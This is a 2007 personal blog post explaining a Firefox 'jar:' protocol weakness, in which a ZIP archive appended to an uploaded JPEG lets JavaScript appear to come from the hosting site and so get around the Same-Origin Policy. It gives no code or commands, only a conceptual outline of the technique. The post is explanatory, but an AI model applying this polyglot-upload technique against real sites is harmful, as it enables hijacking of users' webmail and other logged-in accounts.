11/11/2007

JARs and Firefox: Uh-oh

Filed under: General — Andy @ 11:02 pm

So, this is an interestingly complicated issue that’s discussed in GNUCITIZEN’s blog in a lot more detail (1, 2, 3), but I’m posting it here in case someone finds it of interest. (super-executive summary: Bad things can happen with JavaScript due to some things nobody thought about too much.)

Basically, the main reason that JavaScript is secure, and what keeps it from being incredibly dangerous in terms of stealing your access to websites like GMail (or anything else you log in to), is that JavaScript is only allowed to interact with the same domain it comes from. That means, that since things coming from my website (lardbucket.org) don’t have the same domain name as Google’s services (www.google.com), they can’t get at Google’s cookies that identify you, so I can’t impersonate you. (I wouldn’t want to anyway, but it’s just an example.) It’s called the Same-Origin Policy, and it keeps things relatively safe. (Most of the time.)

Unfortunately, someone just realized that Firefox has an interesting protocol handler: jar. To keep the files in Firefox organized into logical groups, Firefox can read JAR files (typically, Java ARchives). And in reality, JAR files have the same format as ZIP files.  To allow Firefox to read necessary things in its interface, you can use a special protocol (like “http” or “ftp”) named “jar”. It can read files out of ZIP archives, essentially.

And JPEG files are technically valid even with a ZIP appended to the end (and the ZIP file is still valid too, try it). So, if you can upload an image file to someone’s server, you can make anyone with Firefox see whatever JavaScript code you want them to, and have it appear to come from that other server’s domain.

Through a combination of other minor and unrelated issues of varying severity (mostly not large issues, all well-known), that means you can run JavaScript code essentially around the Same-Origin Policy, which allows for a dangerous number of things. (Including, but not limited to bad things like people being able to access your Google Account, or whatever webmail you use, and such.)

Anyway, I found that interesting, so perhaps someone else might find it interesting as well. Perhaps not. If you’re interested in more details, check out the GNUCITIZEN links above.

Andy Schmitz

No Comments »

No comments yet.

RSS feed for comments on this post.

Leave a comment

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

News:
News Headlines (from Google News)

Save The Internet
Apache
Valid CSS
Tableless CSS
Debian
EFF Blue Ribbon Campaign
Geek
Hacker (The Good Kind)
Illinois
Optimized with Turck MMCache
Mozilla
PHP Powered
Cost of Iraq War (US Dollars)
Cost of Iraq War (Civilian Casualties)
Valid XHTML 1.0

RSS 2.0 Feed (Main Site)
RSS 2.0 Feed (Commments)
I Use WordPress
"What's a diorama?"
--Ralph Wiggum (from The Simpsons)
:: i will not be silenced ::

Copyright 2008, Andy Schmitz.
Page took 0.318 seconds to generate.

Powered by WordPress